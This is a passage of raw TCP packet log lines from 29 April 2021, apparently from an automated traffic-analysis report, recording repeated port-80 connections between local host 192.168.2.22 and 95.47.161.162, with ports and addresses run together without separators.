                                          Apr 29, 2021 08:23:50.349611998 CEST804948695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:50.383059978 CEST804948695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:50.383337975 CEST4948680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:50.613914967 CEST4948680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:50.615628004 CEST4948780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:50.702342033 CEST804948695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:50.702421904 CEST4948680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:50.704514980 CEST804948795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:50.704690933 CEST4948780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:50.706049919 CEST4948780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:50.796647072 CEST804948795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:50.828676939 CEST804948795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:50.828919888 CEST4948780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:51.051767111 CEST4948780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:51.053309917 CEST4948880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:51.141629934 CEST804948795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:51.141725063 CEST4948780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:51.149594069 CEST804948895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:51.149697065 CEST4948880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:51.151055098 CEST4948880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:51.245891094 CEST804948895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:51.280703068 CEST804948895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:51.280868053 CEST4948880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:51.504740953 CEST4948880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:51.507153988 CEST4948980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:51.599318027 CEST804948895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:51.599456072 CEST4948880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:51.601566076 CEST804948995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:51.601757050 CEST4948980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:51.602871895 CEST4948980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:51.700061083 CEST804948995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:51.732634068 CEST804948995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:51.732708931 CEST4948980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:51.954816103 CEST4948980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:51.956464052 CEST4949080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:52.046922922 CEST804949095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:52.047050953 CEST4949080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:52.048403025 CEST4949080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:52.050766945 CEST804948995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:52.050858021 CEST4948980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:52.137799025 CEST804949095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:52.175792933 CEST804949095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:52.175998926 CEST4949080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:52.430963993 CEST4949080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:52.433674097 CEST4949180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:52.519773960 CEST804949095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:52.519896030 CEST4949080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:52.522603989 CEST804949195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:52.522768974 CEST4949180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:52.524066925 CEST4949180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:52.612874031 CEST804949195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:52.651070118 CEST804949195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:52.651236057 CEST4949180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:52.873838902 CEST4949180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:52.876244068 CEST4949280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:52.962837934 CEST804949195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:52.963043928 CEST4949180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:52.966430902 CEST804949295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:52.966551065 CEST4949280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:52.967845917 CEST4949280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:53.058465958 CEST804949295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:53.092612028 CEST804949295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:53.092823029 CEST4949280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:53.320863008 CEST4949280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:53.322448969 CEST4949380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:53.411964893 CEST804949295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:53.412141085 CEST4949280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:53.413007021 CEST804949395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:53.413130999 CEST4949380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:53.414556026 CEST4949380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:53.506014109 CEST804949395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:53.540388107 CEST804949395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:53.540623903 CEST4949380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:53.767748117 CEST4949380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:53.770281076 CEST4949480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:53.858081102 CEST804949395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:53.858208895 CEST4949380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:53.865345955 CEST804949495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:53.865498066 CEST4949480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:53.866784096 CEST4949480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:53.961751938 CEST804949495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:53.995656013 CEST804949495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:53.995760918 CEST4949480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:54.218729019 CEST4949480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:54.220110893 CEST4949580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:54.313508987 CEST804949495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:54.313631058 CEST4949480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:54.313747883 CEST804949595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:54.313837051 CEST4949580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:54.314910889 CEST4949580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:54.409509897 CEST804949595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:54.445449114 CEST804949595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:54.445641994 CEST4949580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:54.671890974 CEST4949580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:54.674042940 CEST4949680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:54.769838095 CEST804949695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:54.769881010 CEST804949595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:54.769969940 CEST4949680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:54.769982100 CEST4949580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:54.771280050 CEST4949680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:54.865957022 CEST804949695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:54.917239904 CEST804949695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:54.917489052 CEST4949680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:55.139579058 CEST4949680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:55.142025948 CEST4949780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:55.233005047 CEST804949795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:55.233151913 CEST4949780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:55.234579086 CEST4949780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:55.234930038 CEST804949695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:55.235070944 CEST4949680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:55.325006962 CEST804949795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:55.359719992 CEST804949795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:55.360014915 CEST4949780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:55.592255116 CEST4949780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:55.594053030 CEST4949880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:55.682328939 CEST804949795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:55.682454109 CEST4949780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:55.683062077 CEST804949895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:55.683223963 CEST4949880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:55.684708118 CEST4949880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:55.773516893 CEST804949895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:55.811392069 CEST804949895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:55.811522007 CEST4949880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:56.043880939 CEST4949880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:56.045315027 CEST4949980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:56.133152008 CEST804949895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:56.133260012 CEST4949880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:56.135571003 CEST804949995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:56.135683060 CEST4949980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:56.137103081 CEST4949980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:56.226963043 CEST804949995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:56.260298967 CEST804949995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:56.260382891 CEST4949980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:56.485371113 CEST4949980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:56.487571955 CEST4950080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:56.575674057 CEST804949995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:56.575728893 CEST804950095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:56.575926065 CEST4949980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:56.576479912 CEST4950080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:56.577138901 CEST4950080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:56.665328979 CEST804950095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:56.700835943 CEST804950095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:56.701128006 CEST4950080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:56.934376001 CEST4950080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:56.935914040 CEST4950180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:57.022517920 CEST804950095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:57.022669077 CEST4950080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:57.030859947 CEST804950195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:57.031008959 CEST4950180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:57.032484055 CEST4950180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:57.126315117 CEST804950195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:57.159640074 CEST804950195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:57.159781933 CEST4950180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:57.380147934 CEST4950180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:57.381113052 CEST4950280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:57.475178957 CEST804950195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:57.475213051 CEST804950295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:57.475342035 CEST4950180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:57.475419044 CEST4950280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:57.477037907 CEST4950280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:57.571346045 CEST804950295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:57.604276896 CEST804950295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:57.604515076 CEST4950280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:57.838577032 CEST4950280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:57.841003895 CEST4950380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:57.929049969 CEST804950395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:57.929213047 CEST4950380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:57.930341959 CEST4950380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:57.932662010 CEST804950295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:57.932770014 CEST4950280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:58.018637896 CEST804950395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:58.052639008 CEST804950395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:58.052861929 CEST4950380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:58.275635004 CEST4950380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:58.277580023 CEST4950480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:58.363804102 CEST804950395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:58.363936901 CEST4950380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:58.367985964 CEST804950495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:58.368068933 CEST4950480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:58.369174957 CEST4950480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:58.460016012 CEST804950495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:58.493335962 CEST804950495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:58.493515968 CEST4950480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:58.724986076 CEST4950480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:58.726861954 CEST4950580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:58.815757036 CEST804950495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:58.815900087 CEST4950480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:58.817434072 CEST804950595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:58.817585945 CEST4950580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:58.818528891 CEST4950580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:58.908987999 CEST804950595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:58.943658113 CEST804950595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:58.943775892 CEST4950580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:59.164140940 CEST4950580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:59.166457891 CEST4950680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:59.254760027 CEST804950595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:59.254882097 CEST4950580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:59.256246090 CEST804950695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:59.256333113 CEST4950680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:59.257772923 CEST4950680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:59.347798109 CEST804950695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:59.383683920 CEST804950695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:59.383972883 CEST4950680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:59.617120981 CEST4950680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:59.619390965 CEST4950780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:59.708004951 CEST804950695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:59.708127022 CEST4950680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:59.709568977 CEST804950795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:59.709752083 CEST4950780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:59.711113930 CEST4950780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:59.801228046 CEST804950795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:59.834989071 CEST804950795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:59.835197926 CEST4950780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:00.067377090 CEST4950780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:00.069592953 CEST4950880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:00.157742023 CEST804950795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:00.157875061 CEST4950780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:00.164463043 CEST804950895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:00.164952993 CEST4950880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:00.169342995 CEST4950880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:00.263741016 CEST804950895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:00.297617912 CEST804950895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:00.297991037 CEST4950880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:00.522670031 CEST4950880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:00.528413057 CEST4950980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:00.617882967 CEST804950895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:00.617988110 CEST4950880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:00.622756004 CEST804950995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:00.622884989 CEST4950980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:00.624250889 CEST4950980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:00.718750000 CEST804950995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:00.752571106 CEST804950995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:00.752774000 CEST4950980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:00.965739012 CEST4950980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:00.966669083 CEST4951080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:01.060226917 CEST804950995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:01.060343027 CEST4950980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:01.061471939 CEST804951095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:01.061635017 CEST4951080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:01.062952042 CEST4951080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:01.157959938 CEST804951095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:01.191457033 CEST804951095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:01.191723108 CEST4951080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:01.426608086 CEST4951080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:01.427988052 CEST4951180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:01.521599054 CEST804951095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:01.521848917 CEST4951080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:01.522294998 CEST804951195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:01.522420883 CEST4951180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:01.523696899 CEST4951180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:01.618077993 CEST804951195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:01.652654886 CEST804951195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:01.652920008 CEST4951180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:01.878041029 CEST4951180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:01.879828930 CEST4951280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:01.972595930 CEST804951195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:01.972738981 CEST4951180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:01.974199057 CEST804951295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:01.975023985 CEST4951280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:01.975687981 CEST4951280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:02.070456028 CEST804951295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:02.104321003 CEST804951295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:02.104473114 CEST4951280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:02.330641031 CEST4951280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:02.332808018 CEST4951380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:02.421379089 CEST804951395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:02.421571970 CEST4951380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:02.422961950 CEST4951380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:02.425128937 CEST804951295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:02.425344944 CEST4951280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:02.511310101 CEST804951395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:02.547758102 CEST804951395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:02.548188925 CEST4951380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:02.765321970 CEST4951380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:02.766700029 CEST4951480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:02.853693008 CEST804951395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:02.853888988 CEST4951380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:02.861140966 CEST804951495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:02.861248970 CEST4951480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:02.862381935 CEST4951480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:02.956722975 CEST804951495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:02.993757963 CEST804951495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:02.993927002 CEST4951480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:03.211612940 CEST4951480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:03.212507010 CEST4951580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:03.301362038 CEST804951595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:03.301547050 CEST4951580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:03.302946091 CEST4951580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:03.305876017 CEST804951495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:03.306014061 CEST4951480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:03.391901970 CEST804951595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:03.428528070 CEST804951595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:03.428725958 CEST4951580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:03.653366089 CEST4951580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:03.654297113 CEST4951680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:03.742167950 CEST804951595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:03.742336035 CEST4951580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:03.744035959 CEST804951695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:03.744194031 CEST4951680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:03.745479107 CEST4951680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:03.835232019 CEST804951695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:03.868875027 CEST804951695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:03.869160891 CEST4951680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:04.093447924 CEST4951680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:04.094870090 CEST4951780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:04.182646036 CEST804951695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:04.182745934 CEST4951680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:04.188910007 CEST804951795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:04.189157009 CEST4951780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:04.190396070 CEST4951780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:04.285449982 CEST804951795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:04.318844080 CEST804951795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:04.319077969 CEST4951780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:04.546175003 CEST4951780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:04.547142029 CEST4951880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:04.637521029 CEST804951895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:04.637634039 CEST4951880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:04.638921976 CEST4951880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:04.640292883 CEST804951795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:04.640439034 CEST4951780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:04.729851007 CEST804951895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:04.764005899 CEST804951895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:04.764091969 CEST4951880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:05.002455950 CEST4951880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:05.004545927 CEST4951980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:05.093275070 CEST804951895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:05.093398094 CEST4951880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:05.099230051 CEST804951995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:05.099323988 CEST4951980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:05.100496054 CEST4951980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:05.194807053 CEST804951995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:05.228657007 CEST804951995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:05.228929996 CEST4951980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:05.447086096 CEST4951980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:05.447957993 CEST4952080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:05.537658930 CEST804952095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:05.538355112 CEST4952080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:05.538383007 CEST4952080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:05.541229963 CEST804951995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:05.541322947 CEST4951980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:05.631293058 CEST804952095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:05.665273905 CEST804952095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:05.665862083 CEST4952080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:05.890520096 CEST4952080192.168.2.2295.47.161.162
